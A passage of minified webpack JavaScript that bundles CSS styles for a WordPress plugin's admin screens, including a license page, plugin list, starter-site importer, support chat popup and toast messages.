!important;color:#000;font-size:24px;line-height:1.2em;font-weight:600}.ultp-license__form{margin-bottom:30px !important}.ultp-license__form input{width:100%;padding:0 8px;color:#000 !important;border-radius:4px !important;max-height:40px !important;border-color:currentColor !important}.ultp-license__helper-text{font-size:12px;color:#80837f;margin-top:8px !important}.ultp-license__renew-link{display:flex;align-items:center;gap:6px;color:#fff;background-color:#f17b2c;border-radius:6px;box-shadow:none;padding:4px 8px;cursor:pointer;text-decoration:none;margin-left:12px}.ultp-license__renew-link:hover{color:#fff}.ultp-license__link{color:var(--brand-color)}.ultp-license__status-messages{display:flex;flex-direction:column;gap:30px;margin-top:48px !important;margin-bottom:48px !important}.ultp-license__status-message{display:flex;align-items:center;font-size:14px}.ultp-license__status-message-label{text-align:left;color:#000;width:133px}.ultp-license__status-message-value{color:#000;text-align:left}.ultp-license__status-message-value::before{content:":";margin-right:33px !important;color:#000}.ultp-license__faq{max-width:567px;width:40%;padding-left:32px !important;border-left:1px solid #d5dad4}.ultp_license_action_btn{display:flex;gap:10px;margin-left:auto;margin-top:32px !important;text-transform:none;text-decoration:none;justify-content:center;font-size:14px;font-weight:500;border-radius:4px;background-color:var(--brand-color);width:fit-content;padding:10px 20px !important;color:#fff;cursor:pointer}.ultp-activate-loading{--loader-size: 22px;--loader-thickness: 3px;--loader-brand-color: #ffffff;width:var(--loader-size);aspect-ratio:1;border-radius:50%;background:radial-gradient(farthest-side, var(--loader-brand-color) 94%, rgba(0, 0, 0, 0)) top/var(--loader-thickness) var(--loader-thickness) no-repeat,conic-gradient(rgba(0, 0, 0, 0) 30%, var(--loader-brand-color));mask:radial-gradient(farthest-side, rgba(0, 0, 0, 0) calc(100% - var(--loader-thickness)), #000 0);animation:ultp-activate-loading 1s infinite linear}@keyframes ultp-activate-loading{100%{transform:rotate(1turn)}}.ultp-license-faq__item{margin-bottom:32px !important}.ultp-license-faq__question{text-align:left;color:#000;font-size:24px;font-weight:600;line-height:1.3em}.ultp-license-faq__answer{text-align:left;color:#262a25;margin-top:8px !important;font-size:14px}.ultp-license-message{display:flex;align-items:flex-start;background-color:var(--brand-color-fade);border:1px solid var(--brand-color);border-radius:8px;padding:24px !important}.ultp-license-message__icon{color:var(--brand-color);font-size:24px;margin-right:16px !important}.ultp-license-message__content{flex:1}.ultp-license-message__title{color:#0b0e04;margin-top:-8px !important;margin-bottom:8px !important}.ultp-license-message__text{text-align:left;color:#0b0e04;font-size:14px}.ultp-license-message-congrats{font-size:24px;font-weight:600}.ultp-custom-skeleton-loader{background:linear-gradient(90deg, #eee 25%, #ddd 50%, #eee 75%);background-size:200% 100%;animation:ultp-custom-skeleton-anim 4s infinite;display:inline-block}@keyframes ultp-custom-skeleton-anim{0%{background-position:200% 0}100%{background-position:-200% 0}}.ultp-license__upgrade-message{display:flex;gap:12px;align-items:end}.ultp-license__upgrade-message .ultp-license__upgrade-message-title{display:flex;flex-direction:column;gap:4px}.ultp-license__upgrade-message .ultp-license__upgrade-message-title select{min-height:36px;width:100%;max-width:100%}.ultp-license__upgrade-message .ultp-license__upgrade-link{color:#fff;background-color:var(--brand-color);text-decoration:none;font-weight:500;font-size:14px;padding:8px 16px;border-radius:4px}',""]);const l=i},2041:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-plugins-wrapper{background-color:var(--postx-h1-fontsize)}.ultp-plugin-items{display:grid;grid-template-columns:repeat(4, 1fr);gap:32px}@media only screen and (max-width: 1200px){.ultp-plugin-items{grid-template-columns:repeat(2, 1fr)}}@media only screen and (max-width: 425px){.ultp-plugin-items{grid-template-columns:repeat(1, 1fr)}}.ultp-plugin-items .ultp-plugin-item{padding:24px;background:#fff;box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863);border-radius:8px;display:flex;gap:12px;flex-direction:column}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-title{display:flex;align-items:center;gap:16px;font-weight:600;font-size:18px;line-height:24px;color:#070707}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-title img{width:40px;height:40px}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-desc{font-weight:400;font-size:14px;line-height:20px;color:#4a4a4a}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action{display:flex;align-items:center;gap:20px}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-secondary-button{padding:10px 24px;font-weight:500}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-secondary-button:hover{background-color:#070707;color:#fff}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-transparent-alter-button{color:#070707;font-weight:500}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-activated-button{background-color:#fff;color:#1f66ff;border:1px solid #1f66ff;cursor:not-allowed}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-activated-button:hover{background-color:#fff;color:#1f66ff}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-active-btn{gap:10px}.ultp-plugin-items .ultp-plugin-item-loading{--loader-size: 18px;--loader-thickness: 3px;--loader-brand-color: var(--postx-primary-color);width:var(--loader-size);aspect-ratio:1;border-radius:50%;background:radial-gradient(farthest-side, var(--loader-brand-color) 94%, rgba(0, 0, 0, 0)) top/var(--loader-thickness) var(--loader-thickness) no-repeat,conic-gradient(rgba(0, 0, 0, 0) 30%, var(--loader-brand-color));mask:radial-gradient(farthest-side, rgba(0, 0, 0, 0) calc(100% - var(--loader-thickness)), #000 0);animation:ultp-install-loading 1s infinite linear}@keyframes ultp-install-loading{100%{transform:rotate(1turn)}}",""]);const l=i},6657:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultpPages li.active{color:#ee0404}.tableCon{margin-top:30px;border-radius:4px;box-shadow:0 1px 2px 0 rgba(8,68,129,.2)}.ultp-bulk-con{display:flex;justify-content:space-between;border-radius:4px 4px 0 0 !important;box-shadow:unset !important;flex-wrap:wrap;gap:20px}.ultp-bulk-con>div{display:flex;gap:15px}.ultp-bulk-con select,.ultp-bulk-con input{max-height:35px}.ultp-bulk-con .ultp-primary-button{padding:6px 15px}.ultp-bulk-con input[type=text],.ultp-bulk-con select{border:1px solid #eaedf2;padding-left:12px}.ultp-bulk-con input[type=text]:focus,.ultp-bulk-con select:focus{box-shadow:none;outline:0;border:1px solid var(--postx-primary-color)}.pageCon{display:flex;justify-content:space-between;border-radius:0 0 4px 4px;padding:22px 25px;background:#fff}.pageCon .ultpPages{display:flex;gap:12px}.pageCon .ultpPages .currentPage{background:#000;border-radius:50%;font-size:14px;color:var(--postx-white-color);height:25px;width:25px;text-align:center}.pageCon .ultpPages span:not(.currentPage){cursor:pointer;display:flex;align-items:center}.pageCon .ultpPages span:not(.currentPage) svg{height:14px;width:14px}.shortCode{cursor:copy;position:relative}.shortCode span{background:rgba(0,0,0,.7);color:#fff;border-radius:6px;position:absolute;left:calc(100% + 6px);padding:2px 6px}th.title{width:220px}th.fontType{width:65px}th.fontpreview{width:300px}.fontType{text-align:center}.actions{position:relative}.actions .dashicons{cursor:pointer}.actions .actionPopUp{position:absolute;width:130px;right:0;text-align:left;padding:10px;z-index:1}.actions .actionPopUp li{cursor:pointer;margin-bottom:8px;padding:0 6px}.actions .actionPopUp li a{display:block;text-decoration:none}.actions .actionPopUp li:hover{background:rgba(3,127,255,.04);border-radius:4px}.actions .actionPopUp li .dashicons{font-size:16px;margin-right:5px}.ultpTable{width:100%}.ultpTable table{width:100%;border-spacing:0px}.ultpTable table thead tr{background:rgba(3,127,255,.04)}.ultpTable table thead tr th{font-size:14px;border-bottom:1px solid #e7eef7;border-top:1px solid #e7eef7;padding:15px 0px;color:#091f36}.ultpTable table th:first-child,.ultpTable table td:first-child{padding-left:25px;padding-right:12px;width:55px}.ultpTable table th:last-child,.ultpTable table td:last-child{text-align:center;padding-right:25px}.ultpTable table tbody{background:#fff}.ultpTable table tbody .dashicons{vertical-align:middle}.ultpTable table tbody tr td{border-bottom:1px solid #eaedf2;padding:15px 0px;color:#575a5d;font-size:14px}.ultpTable table tbody tr td.title a{color:var(--postx-primary-color)}.ultpTable table tbody tr td.typeDate{text-transform:capitalize}@media only screen and (max-width: 1350px){.ultpTable{overflow-x:auto}.ultpTable table{width:1200px}}",""]);const l=i},2793:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-addon-lock-container{position:fixed;top:20%;z-index:999;background:#fff;padding:40px 100px;border-radius:4px;box-shadow:0 50px 99px 0 rgba(62,51,51,.5)}.ultp-addon-lock-container .ultp-popup-unlock{display:flex;flex-direction:column;align-items:center;justify-content:center;max-width:300px;width:100%;width:100%;gap:20px}.ultp-addon-lock-container .ultp-popup-unlock .title{text-align:center}.ultp-addon-lock-container .ultp-popup-unlock img{height:112px}.ultp-addon-lock-container .ultp-popup-unlock .ultp-description{text-align:center}.ultp-addon-lock-container .ultp-popup-close{position:absolute;font-size:0px;top:0;right:-10%;height:40px;width:40px;border-radius:50%;color:#000;cursor:pointer;border:none;padding:12px;background:#fff}.ultp-addon-lock-container .ultp-popup-close:hover{background:red}.ultp-addon-lock-container .ultp-popup-close:hover svg{color:#fff}.ultp-addon-lock-container-overlay{background:rgba(0,0,0,.7);position:absolute;right:0;height:100%;width:100%;z-index:999;top:0;display:flex;justify-content:center}",""]);const l=i},4558:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp-settings-container.ultp-settings-container-startersites{padding-top:0;padding-left:0;padding-right:0}.ultp-settings-container.ultp-settings-container-startersites .ultp-settings-content{max-width:100%}.ultp-settings-container.ultp-settings-container-startersites .ultp-premade-grid{max-width:1376px;margin:0 auto;padding-left:30px;padding-right:30px}#ultp-starter-preview.mobileView,#ultp-starter-preview.tabletView{box-shadow:#828282 0px 0px 12px -3px;border-radius:8px 8px 0px 0px;margin-top:24px}.ultp_starter_packs_demo .wp-full-overlay-sidebar{width:300px !important}.ultp_starter_packs_demo.expanded .wp-full-overlay-footer{width:299px !important}.ultp_starter_packs_demo .wp-full-overlay-main::before{content:unset}.ultp_starter_packs_demo.wp-full-overlay.expanded{margin-left:300px !important}.ultp_starter_packs_demo.inactive.expanded{margin-left:0 !important}.ultp_starter_packs_demo.inactive.expanded .wp-full-overlay-sidebar,.ultp_starter_packs_demo.inactive.expanded .wp-full-overlay-footer{margin-left:-300px !important}.ultp_starter_packs_demo .ultp_starter_packs_demo_header{display:flex;justify-content:space-between;padding-right:12px;padding-left:12px;align-items:center;height:100%}.ultp_starter_packs_demo .ultp_starter_packs_demo_header .packs_title{font-size:14px}.ultp_starter_packs_demo .ultp-starter-packs-device-container{display:flex;gap:10px;line-height:normal;align-items:center;justify-content:center}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device{border:1px solid rgba(0,0,0,0);height:14px;padding:2px;transition:400ms}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device svg{width:15px;cursor:pointer;color:#091f36;opacity:.5}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device.d-active{border:1px solid #091f36;border-radius:2px}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device.d-active svg{opacity:1}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device:hover svg{opacity:1}.ultp_starter_packs_demo .close-full-overlay{margin-left:12px;border:none;padding:0;width:auto}.ultp_starter_packs_demo .close-full-overlay:hover{background:none;color:var(--postx-primary-color)}.ultp_starter_packs_demo .ultp_starter_preset_container{padding:20px}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp_starter_reset_container{display:flex;justify-content:space-between;margin-bottom:15px;align-items:center}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp_starter_reset_container .dashicons{font-size:16px;height:16px;cursor:pointer}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group{display:grid;grid-template-columns:1fr 1fr;gap:10px}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group .ultp_starter_preset_list{background:#fff;display:flex;padding:4px;gap:2px;align-items:center;justify-content:space-between;margin-bottom:0;cursor:pointer;border-radius:4px;border:1px solid #ededed}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group .ultp_starter_preset_list.active,.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group .ultp_starter_preset_list:hover{border:1px solid #037fff}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-global-color,.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-global-current-color{width:20px;height:20px;border-radius:50%;display:inline-block;box-shadow:0 0 5px 1px rgba(0,0,0,.05);border:1px solid #e5e5e5}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group{display:flex;gap:10px;flex-wrap:wrap;margin-bottom:25px;position:relative}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list{background:#fff;display:flex;padding:5px;cursor:pointer;border-radius:2px;border:1px solid #ededed;margin-bottom:0;width:55px;box-sizing:border-box;justify-content:center}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list.active,.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list:hover{border:1px solid #037fff}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list>span{font-size:24px}.ultp_starter_packs_demo .ultp_starter_import_options{position:absolute;bottom:0;width:100%;box-sizing:border-box;padding:15px 20px;border-top:1px solid #dcdcde;background:#fff}.ultp_starter_packs_demo .ultp_starter_import_options .title{text-align:center}.ultp_starter_packs_demo .ultp_starter_import_options .option_buttons{display:flex;gap:10px;justify-content:center;margin-top:10px;margin-bottom:15px}.ultp_starter_packs_demo .ultp_starter_import_options .option_buttons a{width:100%;box-sizing:border-box;text-align:center}.ultp_starter_packs_demo .close-full-overlay{background:#fff}.ultp_starter_packs_demo .wp-full-overlay-header{background:#fff;height:60px}.ultp_starter_packs_demo .packs_title{color:#091f36;font-size:16px;font-weight:600;line-height:normal}.ultp_starter_packs_demo .packs_title span{text-transform:capitalize;display:block;color:#575a5d;font-weight:normal;margin-top:5px}.ultp_starter_packs_demo .ultp-starter-collapse{position:absolute;width:40px;height:40px;right:-20px;background:#fff;border-radius:100px;top:70px;box-shadow:inset 0 0 0 1px rgba(9,32,54,.15),0 2px 15px 6px rgba(9,32,54,.15);text-align:center;line-height:40px;cursor:pointer;transition:400ms;z-index:9999}.ultp_starter_packs_demo .ultp-starter-collapse svg{transform:rotate(90deg);width:100%;transition:400ms;color:#091f36;margin-left:-2px}.ultp_starter_packs_demo .ultp-starter-collapse:hover{transform:scale(1.1);background:#091f36}.ultp_starter_packs_demo .ultp-starter-collapse:hover svg{color:#fff}.ultp_starter_packs_demo .ultp-starter-collapse.inactive{right:-44px}.ultp_starter_packs_demo .ultp-starter-collapse.inactive svg{transform:rotate(-90deg);margin-left:2px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content{background:#f7f9ff;bottom:112px;top:60px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow{padding:25px 20px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow>.ultp_skeleton__custom_size{margin:auto}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow_colors{margin-top:30px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow_colors>.ultp_skeleton__custom_size{margin-bottom:20px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow_colors .demos-color{display:grid;grid-template-columns:1fr 1fr;gap:10px}.ultp_starter_packs_demo .close-full-overlay{height:60px}.ultp_starter_packs_demo .close-full-overlay::before{font-size:32px}.ultp-stater-container-settings-overlay{background:rgba(0,0,0,.7);position:absolute;right:0;height:100vh;width:100vw;z-index:999999999999;top:-32px;display:flex;justify-content:center}.ultp-stater-settings-container{position:fixed;top:6%;z-index:999;background:#fff;border-radius:4px;box-shadow:0 50px 99px 0 rgba(62,51,51,.5);display:flex}.ultp-stater-settings-container>div:first-child{flex:1;max-height:auto;width:600px}.ultp-stater-settings-container .ultp-info{margin-bottom:15px;color:#575a5d}.ultp-stater-settings-container .ultp-info.ultp-info-desc{font-size:16px}.ultp-stater-settings-container .ultp-stater-settings-header{color:#091f36;font-size:16px;font-weight:400;position:absolute;box-sizing:border-box;width:100%;top:0;padding:12px 30px;border-bottom:1px solid #eaedf2}.ultp-stater-settings-container .stater_title{color:#091f36;margin-bottom:15px;font-size:16px;font-weight:600}.ultp-stater-settings-container .ultp-popup-stater{padding:40px 40px 20px;max-height:calc(75vh - 20px);overflow:auto}.ultp-stater-settings-container .ultp-popup-stater .input_container{margin-bottom:15px}.ultp-stater-settings-container .ultp-popup-stater .input_container input[type=checkbox]{margin-right:8px;width:22px;height:20px}.ultp-stater-settings-container .ultp-popup-stater .input_container input[type=checkbox]:checked{background:#092036}.ultp-stater-settings-container .ultp-popup-stater .input_container input[type=checkbox]:checked::before{left:6px;top:9px;font-size:13px;transform:rotate(6deg)}.ultp-stater-settings-container .starter_page_impports{margin-top:25px;margin-bottom:20px}.ultp-stater-settings-container .starter_page_impports .cursor{font-size:14px;margin-top:15px;transition:400ms;color:#091f36;opacity:.7}.ultp-stater-settings-container .starter_page_impports .cursor:hover{opacity:1}.ultp-stater-settings-container .starter_page_impports .cursor svg{height:10px;width:10px;margin-left:4px}.ultp-stater-settings-container .starter_import{padding-left:40px;padding-right:40px;padding-bottom:40px;text-align:center}.ultp-stater-settings-container .starter_import .ultp-primary-button{width:100%;box-sizing:border-box;justify-content:center}.ultp-stater-settings-container .ultp-popup-close{position:absolute;font-size:0px;top:0;right:-10%;height:40px;width:40px;border-radius:50%;color:#000;cursor:pointer;border:none;padding:12px;background:#fff}.ultp-stater-settings-container .ultp-popup-close:hover{background:red}.ultp-stater-settings-container .ultp-popup-close:hover svg{color:#fff}.ultp-stater-settings-container .ultp-popup-close.s_loading{cursor:no-drop}.ultp-stater-settings-container .input_container .email_box{width:100%;box-sizing:border-box;margin:8px 0;border:1px solid #dcdcde;border-radius:2px;padding:5px 15px}.ultp-stater-settings-container .input_container .get_newsletter{background:#888}.ultp-stater-settings-container .ultp_successful_import .stater_title{font-size:20px}.ultp-stater-settings-container .ultp_successful_import .ultp_import_builders{margin:20px 0;max-width:80%;font-size:16px}.ultp-stater-settings-container .ultp_successful_import .ultp_import_builders a{color:var(--postx-primary-color);text-decoration:underline}.ultp-stater-settings-container .ultp_successful_import .ultp_import_builders a:hover{color:var(--postx-primary-hover-color)}.ultp-stater-settings-container .ultp_successful_import .ultp-primary-button{margin-bottom:20px}.ultp-stater-settings-container .ultp_processing_import .stater_title{font-size:20px}.ultp-stater-settings-container .ultp_processing_import .progress{font-size:16px;margin-top:12px}.ultp-stater-settings-container .ultp_processing_import .ultp_import_notice{margin-top:10px;margin-bottom:20px;color:var(--postx-warning-button-color)}.ultp-stater-settings-container .ultp_processing_import .ultp_import_notice>span{font-size:14px;font-weight:500}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show{margin-top:20px;margin-bottom:0;text-align:center}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show .ultp-importer-loader{width:100%;height:20px;background-color:#f0f0f0;position:relative;border-radius:4px;overflow:hidden}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show #ultp-importer-loader-bar{width:0;height:100%;background-color:var(--postx-primary-color);position:absolute;transition:width .5s}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show #ultp-importer-loader-percentage{position:absolute;top:50%;left:50%;transform:translate(-50%, -50%)}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show .ultp_processing_loader{border-radius:4px;width:80%;height:12px;display:inline-block;background-color:#f7f9ff;background-image:linear-gradient(-45deg, rgba(0, 0, 0, 0.25) 25%, transparent 25%, transparent 50%, rgba(3, 127, 255, 0.75) 50%, rgba(3, 127, 255, 0.75) 75%, transparent 75%, transparent);font-size:30px;background-size:1em 1em;box-sizing:border-box;animation:ultp_processing_loader .5s linear infinite}@keyframes ultp_processing_loader{0%{background-position:0 0}100%{background-position:1em 0}}.ultp_starter_dark_container{display:flex;gap:5px;align-items:center;margin-bottom:25px;margin-top:15px;font-size:16px}.ultp_starter_dark_container .ultp_starter_dark_enable{display:none;height:0;width:0;border-radius:2px;border:solid 1px #eaedf2;background:#fff;position:relative;margin:0;box-shadow:none}.ultp_starter_dark_container .ultp_starter_dark_enable:checked+label{opacity:unset}.ultp_starter_dark_container .ultp_starter_dark_enable:checked+label::after{left:calc(100% - 3px);transform:translateX(-100%)}.ultp_starter_dark_container>label{color:#037fff;width:36px;height:18px;display:block;cursor:pointer;border-radius:100px;text-indent:-9999px;background:var(--postx-primary-color);opacity:.4;position:relative;margin:0 8px}.ultp_starter_dark_container>label::after{content:"";position:absolute;top:3px;left:3px;width:12px;height:12px;border-radius:90px;background:#fff;transition:.3s}.ultp_starter_dark_container{justify-content:center}.ultp_starter_dark_container .ultp-dl-container{cursor:pointer;display:flex;background:#fff;gap:10px;align-items:center;border-radius:100px;width:140px;height:40px;box-shadow:0px 0px 0 2px rgba(9,32,54,.2),2px 4px 15px 5px rgba(9,32,54,.1)}.ultp_starter_dark_container .ultp-dl-container svg{height:20px;width:20px}.ultp_starter_dark_container .ultp-dl-container .ultp-dl-svg-con{transform:translateX(4px)}.ultp_starter_dark_container .ultp-dl-container .ultp-dl-svg-con.dark svg{color:#fff}.ultp_starter_dark_container .ultp-dl-svg{display:flex;background:#091f36;padding:6px;border-radius:50%}.ultp_starter_dark_container .ultp-dl-svg svg{fill:#ffc107}.iframe_loader{height:100%;width:100%;background-color:#fff;overflow-y:scroll}.iframe_loader .iframe_container{width:calc(100% - 80px);height:100%;display:flex;flex-direction:column;gap:40px;padding:60px 40px}.iframe_loader .iframe_header_top{display:flex;justify-content:space-between;gap:40px;align-items:center}.iframe_loader .header_top_right{display:flex;justify-content:space-between;align-items:center;gap:20px}.iframe_loader .iframe_body{height:100%;display:flex;flex-wrap:wrap;gap:24px;margin-top:20px}.iframe_loader .iframe_body_slider{margin-bottom:60px}.iframe_loader .iframe_body_left{flex-basis:calc(60% - 12px);border-radius:4px;display:flex;flex-direction:column;gap:20px}.iframe_loader .iframe_body_right{flex-basis:calc(40% - 12px);border-radius:4px;display:flex;flex-direction:column;gap:20px}.ultp-starter-button{cursor:pointer;padding:12px 25px;color:#fff !important;font-size:14px;background:linear-gradient(180deg, #399aff, transparent) #004fd0;border-radius:4px;text-decoration:none;display:inline-block;width:fit-content;border:none;transition:background-color 400ms}.ultp-starter-button:hover{background-color:var(--postx-primary-color)}',""]);const l=i},6922:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,':root{--xpo-support-color-primary: #335cff;--xpo-support-color-secondary: #4263eb;--xpo-support-color-base-one: #ffffff;--xpo-support-color-base-two: #e1e7ff;--xpo-support-color-base-three: #e0e0e0;--xpo-support-color-green: #09fd09;--xpo-support-color-red: #fb3748;--xpo-support-color-dark: #070707;--xpo-support-color-reverse: #ffffff;--xpo-support-color-title: #0e121b;--xpo-support-color-border-primary: #e1e4ea;--xpo-support-color-shadow: rgba(0, 0, 0, 0.1)}.xpo-support-pops-btn{position:fixed;bottom:34px;right:20px;background-color:var(--xpo-support-color-primary);border-radius:50%;width:56px;height:56px;display:flex;justify-content:center;align-items:center;box-shadow:0 4px 15px var(--xpo-support-color-shadow);cursor:pointer;z-index:9999;transition-property:all;transition-duration:.2s}.xpo-support-pops-btn--small{scale:.8;bottom:0px;right:0px;transition-property:all;transition-duration:.2s}.xpo-support-pops-btn--small:hover:after{content:"";position:absolute;inset:-20px;z-index:-10}.xpo-support-pops-btn--small:hover{scale:1;bottom:34px;right:20px}.xpo-support-pops-btn--big{scale:1 !important;bottom:34px !important;right:20px !important}.xpo-support-pops-container--full-height{max-height:551px;height:calc(100vh - 150px);overflow:auto !important}.xpo-support-pops-container{position:fixed;bottom:90px;right:20px;background-color:var(--xpo-support-color-base-one);border-radius:8px;box-shadow:0 4px 15px var(--xpo-support-color-shadow);overflow:hidden;width:400px;max-width:calc(100% - 40px);z-index:9999;margin-bottom:8px}.xpo-support-pops-header{background-color:var(--xpo-support-color-primary);color:var(--xpo-support-color-reverse);text-align:center;padding:24px 24px 0;position:relative;overflow:hidden;z-index:0}.xpo-support-header-bg{position:absolute;inset:0;z-index:-1;opacity:.2;background:radial-gradient(circle, var(--xpo-support-color-secondary) 4px, transparent 5px),radial-gradient(circle, var(--xpo-support-color-reverse) 5px, transparent 5px);background-repeat:repeat;background-size:20px 20px,20px 20px}.xpo-support-pops-avatars{width:fit-content;margin:0 auto;position:relative}.xpo-support-pops-avatars img{display:inline-block;justify-content:center;align-items:center;margin-bottom:15px;width:60px;height:60px;border-radius:50%;margin-left:-20px;border:2px solid var(--xpo-support-color-primary);margin-bottom:5px}.xpo-support-signal{width:10px;height:10px;border-radius:50%;display:inline-block;margin-left:5px;border:2px solid var(--xpo-support-color-base-one);position:absolute;bottom:14px;right:6px}.xpo-support-signal-green{background-color:var(--xpo-support-color-green)}.xpo-support-signal-red{background-color:var(--xpo-support-color-red)}.xpo-support-pops-text{font-weight:600;font-size:14px;padding-bottom:24px}.xpo-support-chat-body{padding:20px}.xpo-support-title{font-size:14px;font-weight:500;line-height:20px;letter-spacing:-0.08px;color:var(--xpo-support-color-title);margin-bottom:4px}input.xpo-input-support,textarea.xpo-input-support{width:100%;padding:12px;border:1px solid var(--xpo-support-color-border-primary);border-radius:4px;font-size:16px;outline:none;margin-bottom:16px}input[type=email].xpo-input-support{max-height:48px}textarea.xpo-input-support{min-height:150px;resize:none}.xpo-send-button{background-color:var(--xpo-support-color-primary);color:var(--xpo-support-color-reverse);width:100%;padding:15px;border:none;border-radius:4px;font-size:16px;font-weight:500;cursor:pointer;display:flex;justify-content:center;align-items:center;gap:10px}.xpo-support-animation{width:45px;height:45px;border-radius:50%;display:block;stroke-width:2;margin:10px !important;color:var(--xpo-support-color-base-one);stroke-miterlimit:10;box-shadow:inset 0 0 0 var(--xpo-support-color-base-two);animation:fill-message .4s ease-in-out .4s forwards,scale-message .3s ease-in-out .9s both;margin-right:10px !important}@keyframes scale-message{0%,100%{transform:none}50%{transform:scale3d(1.1, 1.1, 1)}}@keyframes fill-message{100%{box-shadow:inset 0px 0px 0px 30px var(--xpo-support-color-base-two)}}.xpo-support-circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;color:var(--xpo-support-color-base-two);fill:none;animation:stroke-message .6s cubic-bezier(0.65, 0, 0.45, 1) forwards}.xpo-support-check{stroke-width:2;color:var(--xpo-support-color-primary)}@keyframes stroke-message{100%{stroke-dashoffset:0}}.xpo-support-thankyou-icon{line-height:0;margin:0 auto;width:fit-content}.xpo-support-thankyou-title{margin:24px auto 12px;font-size:24px;font-weight:600;line-height:32px;letter-spacing:-0.36px;color:var(--xpo-support-color-dark);text-align:center}.xpo-support-thankyou-subtitle{font-size:14px;line-height:20px;font-weight:400;letter-spacing:-0.18px;text-align:center}.xpo-support-entry-anim{animation:xpo-support-entry-anim 200ms ease 0s 1 normal forwards}@keyframes xpo-support-entry-anim{0%{opacity:0;transform:translateY(50px)}100%{opacity:1;transform:translateY(0)}}.xpo-support-loading{--loader-size: 21px;--loader-thickness: 3px;--loader-brand-color: var(--xpo-support-color-reverse);width:var(--loader-size);aspect-ratio:1;border-radius:50%;background:radial-gradient(farthest-side, var(--loader-brand-color) 94%, rgba(0, 0, 0, 0)) top/var(--loader-thickness) var(--loader-thickness) no-repeat,conic-gradient(rgba(0, 0, 0, 0) 30%, var(--loader-brand-color));mask:radial-gradient(farthest-side, rgba(0, 0, 0, 0) calc(100% - var(--loader-thickness)), #000 0);animation:xpo-support-loading-anim 1s infinite linear}@keyframes xpo-support-loading-anim{100%{transform:rotate(1turn)}}#xpo-support-file-input{width:100%;max-width:100%;color:#444;padding:4px;background:#fff;border:1px solid var(--xpo-support-color-border-primary);border-radius:4px;font-size:14px;min-height:unset}#xpo-support-file-input::file-selector-button{margin-right:20px;border:none;background:var(--xpo-support-color-primary);padding:5px 10px;font-size:16px;border-radius:4px;color:var(--xpo-support-color-reverse);cursor:pointer;transition:background .2s ease-in-out}#xpo-support-file-input::file-selector-button:hover{background:var(--xpo-support-color-secondary)}',""]);const l=i},439:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".toastMessages{display:flex;flex-direction:column;gap:10px;padding:10px;position:fixed;right:400px;z-index:1001;top:70px}.toast{position:absolute}.toaster{position:fixed;visibility:hidden;width:345px;background-color:#fefefe;height:76px;border-radius:4px;box-shadow:0px 0px 4px #9f9f9f;display:flex;align-items:center}.toaster span{display:block}.toaster .itmCenter{font-size:14px}.toaster .itmLast{padding:0 15px;margin-left:auto;height:100%;display:flex;align-items:center;border-left:1px solid #f2f2f2}.toaster .itmLast:hover{cursor:pointer;background-color:#f2f2f2}.toaster.show{visibility:visible;-webkit-animation:fadeinmessage .7s;animation:fadeinmessage .7s}@keyframes 